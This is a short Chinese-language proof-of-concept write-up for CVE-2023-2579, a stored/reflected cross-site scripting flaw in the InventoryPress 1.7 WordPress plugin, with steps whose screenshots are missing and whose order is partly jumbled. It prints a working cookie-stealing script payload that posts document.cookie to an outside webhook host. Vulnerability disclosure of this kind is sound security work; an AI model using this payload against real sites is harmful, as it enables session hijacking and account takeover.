
CVE-2023-2579 的 PoC
CVE-2023-2579 ID 已被保留,PoC 已在 WPScan 网站上发布: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
标题:InventoryPress WordPress CMS 插件中的认证反射型跨站脚本漏洞
日期:2023-04-21
作者:Danilo Albuquerque
供应商主页:https://wordpress.org
软件链接:https://wordpress.org/download
版本:WordPress 6.2
插件名称及版本:InventoryPress 1.7
测试环境:Brave(版本 1.50.119 Chromium:112.0.5615.121(官方版本)64位)
完成上述步骤并刷新当前页面后,会弹出一个包含该消息的警告弹窗。
转到可以添加物品到库存的页面:

将恶意载荷添加到表单的"描述"输入框中:

访问插件生成的新物品链接:

请求完成后,显示警告弹窗:

将以下用于窃取 Cookie 的恶意载荷添加到"描述"输入框中:<script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>。然后发布新物品,或更新旧物品;
触发并在 Webhook 站点获取凭据
添加载荷并发布物品(或更新它):

触发并获取凭据:
